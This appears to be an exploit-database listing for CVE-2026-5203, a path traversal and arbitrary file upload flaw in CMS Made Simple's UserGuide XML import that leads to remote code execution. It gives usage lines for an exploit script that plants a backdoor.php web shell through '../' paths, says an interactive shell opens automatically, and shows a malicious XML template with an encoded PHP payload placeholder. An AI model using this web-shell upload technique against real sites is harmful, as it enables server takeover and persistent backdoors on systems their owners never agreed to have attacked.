Share
## https://sploitus.com/exploit?id=8374CFD7-CB1D-5D01-A3A7-BCE355F92621
# CVE-2026-5203 โ CMS Made Simple โค 2.2.22 RCE (Path Traversal + Arbitrary File Upload)
  
## Summary
The `UserGuide` module's XML import functionality in **CMS Made Simple โค 2.2.22** fails to sanitize user-supplied filenames, allowing an authenticated administrator to upload arbitrary files (e.g. PHP web shells) anywhere on the server filesystem via path traversal sequences.
| Field | Value |
|--------------------|---------------------------------------------------|
| **Type** | Path Traversal / Arbitrary File Upload โ RCE |
| **Component** | `UserGuide` Module โ XML Import |
| **Affected File** | `modules/UserGuide/lib/class.UserGuideImporterExporter.php` |
| **CVSS v3.1** | `7.2 HIGH` โ `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` |
| **Auth Required** | Yes (Administrator) |
---
## Vulnerable Code
```php
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir = (string) $xmlFile->isdir;
```
The function writes Base64-decoded content directly to the attacker-controlled path.
---
## Usage
```bash
python exploit.py [upload_path]
```
**Examples:**
```bash
# Default path
python exploit.py http://target.com http://target.com/admin admin password123
# Custom upload path
python exploit.py http://target.com http://target.com/admin admin password123 \
../../../../../../var/www/html/backdoor.php
```
Interactive shell starts automatically if the web shell is reachable after upload.
---
## Malicious XML Structure
```xml
UserGuide
1.3
../../../webshell.php
0
[BASE64_ENCODED_PHP_CODE]
```
---